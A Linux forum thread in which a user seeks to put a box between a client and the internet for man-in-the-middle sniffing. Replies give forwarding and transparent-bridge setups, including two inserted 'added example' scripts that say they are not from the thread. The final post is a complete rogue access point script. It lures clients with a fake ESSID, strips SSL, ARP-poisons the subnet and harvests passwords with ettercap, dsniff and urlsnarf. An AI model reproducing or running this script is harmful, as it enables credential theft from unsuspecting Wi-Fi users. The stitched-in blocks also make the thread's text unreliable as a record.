Redirecting ALL traffic from one ethernet port to another
So the title says it all.
My linux knowledge is still limited, and I would like to know how I can achieve this.
Should I be using iptables to set this up? If so, could someone provide the commands?
(redirecting all incoming/outgoing traffic from eth1 to eth2, and vice versa)
Thanks,
.L
Re: Redirecting ALL traffic from one ethernet port to another
Quote:
Originally Posted by
Lucifer
So the title says it all.
My linux knowledge is still limited, and I would like to know how I can achieve this.
Should I be using iptables to set this up? If so, could someone provide the commands?
(redirecting all incoming/outgoing traffic from eth1 to eth2, and vice versa)
Thanks,
.L
Are you looking to setup a bridge or a route?
Re: Redirecting ALL traffic from one ethernet port to another
Well, I'm not sure what to call it.
An ethernet device on my first port needs to be connected to the internet on my second port, and I'm looking to set up some mitm attacks between those two ports, so all the traffic from the ethernet client can be sniffed.
Thanks,
Re: Redirecting ALL traffic from one ethernet port to another
Sounds to me like you want to act as a router.
This command will enable IP forwarding and have your machine act as a router:
Code:
echo 1 >/proc/sys/net/ipv4/ip_forward
It's more complex than running just that command, though. You will need to make sure you have setup your routes correctly on both your victim machine and on your router. You haven't given me enough information to help you any further, and I suspect you're going to need to do a lot more reading.
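The router approach described above, as an added example that is not code from the thread: it enables forwarding the same way as the command in the post and then installs an explicit FORWARD policy rather than leaving forwarding wide open. The interface names eth1 (client side) and eth2 (internet side) and the inside subnet 10.0.0.0/24 are assumptions; commands are only printed unless APPLY=1 is set, since applying them needs root.

```shell
#!/bin/sh
# Added example (not from the thread): make this Linux box a router between an
# inside NIC and an outside NIC. Names eth1/eth2 and 10.0.0.0/24 are assumed.
# Without APPLY=1 in the environment every command is printed, not executed.

APPLY="${APPLY:-0}"

# Execute a command when APPLY=1, otherwise print it (dry run).
run() {
    if [ "$APPLY" = "1" ]; then "$@"; else printf '%s\n' "$*"; fi
}

# Shape check for the subnet before it reaches an iptables command line:
# four dotted numbers, one slash, prefix length 0-32, nothing else.
valid_cidr() {
    case "$1" in
        [0-9]*.[0-9]*.[0-9]*.[0-9]*/[0-9]*) ;;
        *) return 1 ;;
    esac
    case "$1" in *[!0-9./]*) return 1 ;; esac      # digits, dots, slash only
    case "${1#*/}" in */*) return 1 ;; esac        # exactly one slash
    p="${1##*/}"
    [ "$p" -le 32 ]
}

# IN = interface facing the client, OUT = interface facing the internet,
# NET = the client-side subnet that is allowed to be forwarded.
setup_router() {
    IN="$1"; OUT="$2"; NET="$3"
    valid_cidr "$NET" || { echo "invalid subnet: $NET" >&2; return 1; }
    # Same effect as: echo 1 > /proc/sys/net/ipv4/ip_forward
    run sysctl -w net.ipv4.ip_forward=1
    # Default deny in FORWARD, then allow only the two directions we intend.
    run iptables -P FORWARD DROP
    run iptables -A FORWARD -i "$IN" -o "$OUT" -s "$NET" -j ACCEPT
    run iptables -A FORWARD -i "$OUT" -o "$IN" -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
    # Hide the inside subnet behind the outside interface's address.
    run iptables -t nat -A POSTROUTING -s "$NET" -o "$OUT" -j MASQUERADE
}

setup_router eth1 eth2 10.0.0.0/24
# The client still needs its default route pointed at this box's eth1 address,
# e.g. on the client: ip route add default via <eth1 address of this box>
```

Routing only works when both sides agree on the path, which is the point the post makes: the client must use this box as its gateway, and the box must both forward and (here) masquerade the client's traffic out of eth2.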
Re: Redirecting ALL traffic from one ethernet port to another
If you're actually going to be wiring the device in to the middle like that then a transparent bridge would work fine, as then it cannot be detected by normal means on the network and you can then use the virtual bridge interface to monitor the traffic, and you don't have to mess around with routing.
Re: Redirecting ALL traffic from one ethernet port to another
It surprises me that it's really as hard as you say.
You could indeed say my linux box would be acting as a simple router between a client and the internet.
I just need to figure out how I can route every single packet from eth1 to eth2, and from eth2 to eth1, depending on the source/destination of course. I thought that would be easy to set up, but I can't figure out how to do it.
EDIT: To streaker69, bridging the connections like you say might do the job. How would I need to configure it? I always figured there would be a quick and easy command to do so, or am I mistaken?
Re: Redirecting ALL traffic from one ethernet port to another
Quote:
Originally Posted by
Lucifer
EDIT: To streaker69, bridging the connections like you say might do the job. How would I need to configure it? I always figured there would be a quick and easy command to do so, or am I mistaken?
I'd think that a quick google search for "bridge +linux" would probably find it quickly. That's how I found it when I did something similar.
Re: Redirecting ALL traffic from one ethernet port to another
As a matter of fact, I'm doing that right now, and it seems like I should install "bridge-utils". Is this tool (or a similar one) included in backtrack?
Re: Redirecting ALL traffic from one ethernet port to another
Just as another hint on this, you do not need to bind IP to either interface or your bridge to monitor its traffic. If you want to stay completely silent on the LAN, you definitely do not want IP bound to these interfaces.
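The transparent bridge that the two posts above describe, as an added example rather than code from the thread: it uses bridge-utils (brctl, the package named earlier) to join two NICs into a bridge that carries no IP address on the ports or on the bridge itself, so the box forwards frames at layer 2 and has no address of its own on the segment. The names br0, eth1 and eth2 are assumptions; commands are only printed unless APPLY=1 is set, since applying them needs root.

```shell
#!/bin/sh
# Added example (not from the thread): IP-less transparent bridge between two
# NICs for inline traffic monitoring. Names br0/eth1/eth2 are assumed.
# Without APPLY=1 in the environment every command is printed, not executed.

APPLY="${APPLY:-0}"

# Execute a command when APPLY=1, otherwise print it (dry run).
run() {
    if [ "$APPLY" = "1" ]; then "$@"; else printf '%s\n' "$*"; fi
}

# Interface names are typed in by the operator; accept only the characters
# Linux allows (letters, digits, _ . -) and the 15-byte IFNAMSIZ limit.
valid_ifname() {
    case "$1" in
        ''|*[!A-Za-z0-9_.-]*) return 1 ;;
    esac
    [ "${#1}" -le 15 ]
}

# Join IF1 and IF2 into bridge BR. No IP is assigned to any of the three, so
# the bridge is invisible at layer 3, as the post above recommends.
make_bridge() {
    BR="$1"; IF1="$2"; IF2="$3"
    for n in "$BR" "$IF1" "$IF2"; do
        valid_ifname "$n" || { echo "invalid interface name: $n" >&2; return 1; }
    done
    run ip addr flush dev "$IF1"          # strip any address already on the ports
    run ip addr flush dev "$IF2"
    run brctl addbr "$BR"
    run brctl addif "$BR" "$IF1"
    run brctl addif "$BR" "$IF2"
    run brctl stp "$BR" off               # do not emit STP BPDUs from the tap
    run sysctl -w "net.ipv6.conf.$BR.disable_ipv6=1"   # no IPv6 link-local on the bridge
    run ip link set "$IF1" up
    run ip link set "$IF2" up
    run ip link set "$BR" up
}

# Undo make_bridge: detach both ports and delete the bridge.
remove_bridge() {
    BR="$1"; IF1="$2"; IF2="$3"
    for n in "$BR" "$IF1" "$IF2"; do
        valid_ifname "$n" || return 1
    done
    run ip link set "$BR" down
    run brctl delif "$BR" "$IF1"
    run brctl delif "$BR" "$IF2"
    run brctl delbr "$BR"
}

make_bridge br0 eth1 eth2
# Once the bridge is up, watch everything crossing it with: tcpdump -ni br0
```

Because nothing on the box answers ARP or carries an address on this segment, the bridge does not show up in a host's routing path; capture tools are pointed at br0 (or either port) and see both directions of traffic.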
Re: Redirecting ALL traffic from one ethernet port to another
I've pieced this script together to work on wifi, but you could easily tailor it to work on a wired connection. Let me know if you have any issues.
Rogue AP + SSL MITM
Code:
#!/bin/bash
LOGDIR="$(date +%F-%H%M)"
mkdir $LOGDIR
cd $LOGDIR
killall -9 dhcpd3 airbase-ng ettercap sslstrip driftnet urlsnarf tail
echo 'Network Interfaces:'
ifconfig | grep Link
echo -n "Enter the name of the interface connected to the internet, for example eth0: "
read -e IFACE
airmon-ng
echo -n "Enter your wireless interface name, for example wlan0: "
read -e WIFACE
echo -n "Enter the ESSID you would like your rogue AP to be called, for example Free WiFi: "
read -e ESSID
airmon-ng stop $WIFACE
ifconfig $WIFACE down
airmon-ng start $WIFACE
ifconfig $WIFACE up
modprobe tun
#airbase-ng is going to create our fake AP with the SSID we specified
airbase-ng -e $ESSID -P -C 30 -v mon0 > airbase.log &
xterm -bg black -fg yellow -T Airbase-NG -e tail -f airbase.log &
sleep 10
echo Configuring interface created by airdrop-ng
ifconfig at0 up
ifconfig at0 10.0.0.1 netmask 255.255.255.0
ifconfig at0 mtu 1400
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
echo 'Setting up iptables to handle traffic seen by the airdrop-ng (at0) interface'
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
echo Creating a dhcpd.conf to assign addresses to clients that connect to us
echo "default-lease-time 600;" > dhcpd.conf
echo "max-lease-time 720;" >> dhcpd.conf
echo "ddns-update-style none;" >> dhcpd.conf
echo "authoritative;" >> dhcpd.conf
echo "log-facility local7;" >> dhcpd.conf
echo "subnet 10.0.0.0 netmask 255.255.255.0 {" >> dhcpd.conf
echo "range 10.0.0.100 10.0.0.254;" >> dhcpd.conf
echo "option routers 10.0.0.1;" >> dhcpd.conf
echo "option domain-name-servers 8.8.8.8;" >> dhcpd.conf
echo "}" >> dhcpd.conf
echo 'DHCP server starting on our airdrop-ng interface (at0)'
dhcpd3 -f -cf dhcpd.conf at0 &
echo "Launching DMESG"
xterm -bg black -fg red -T "System Logs" -e tail -f /var/log/messages &
echo "Launching ettercap, poisoning all hosts on the at0 interface's subnet"
xterm -bg black -fg blue -e ettercap -T -q -p -l etterca.log -i at0 // // &
sleep 8
echo 'Configuring ip forwarding'
echo "1" > /proc/sys/net/ipv4/ip_forward
echo 'Launching various tools'
sslstrip -a -k -f &
driftnet -v -i at0 &
xterm -bg black -fg green -e urlsnarf -i at0 &
dsniff -m -i at0 -d -w dsniff$(date +%F-%H%M).log &
tshark -i at0 -w traffic.pcap &
echo 'Run "etterlog -p etterca.log" to view sniffed passwords.'